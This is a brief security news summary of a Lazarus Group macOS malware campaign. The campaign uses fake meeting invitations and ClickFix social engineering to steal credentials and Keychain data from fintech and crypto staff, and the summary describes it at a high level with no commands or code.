Lazarus Group Launches 'Mach-O Man' macOS Malware Campaign Targeting Fintech and Crypto Businesses
Key Takeaways
- ▸Lazarus Group is actively distributing a new macOS malware kit through fake meeting invitations sent via Telegram, targeting business leaders in fintech and crypto sectors
- ▸The attack uses ClickFix social engineering techniques that prompt users to execute commands to 'fix' connection issues, bypassing traditional security controls
- ▸Compromised macOS devices provide attackers with full access to credentials, browser sessions, and Keychain data—enabling account takeovers and infrastructure compromise
Summary
Security researchers have identified a new active campaign by the Lazarus Group that uses fake meeting invitations and social engineering to distribute a newly discovered macOS malware kit. The attack leverages ClickFix techniques, where victims are tricked into executing commands on their systems through fake collaboration platform interfaces mimicking Zoom, Microsoft Teams, or Google Meet. The campaign specifically targets fintech, cryptocurrency, and high-value environments where macOS is prevalent among developers, executives, and decision-makers.
Once executed, the malware collects sensitive credentials, browser sessions, and macOS Keychain data—providing attackers direct access to corporate systems, SaaS platforms, and financial assets. The stolen data is exfiltrated through Telegram, a legitimate service that helps attackers blend their activities into normal network traffic. The attack is particularly dangerous because it bypasses traditional endpoint detection and response (EDR) tools by relying on user execution of native macOS binaries rather than software vulnerabilities.
- The campaign is difficult to detect because it relies on social engineering and native macOS binaries, reducing visibility for traditional EDR tools
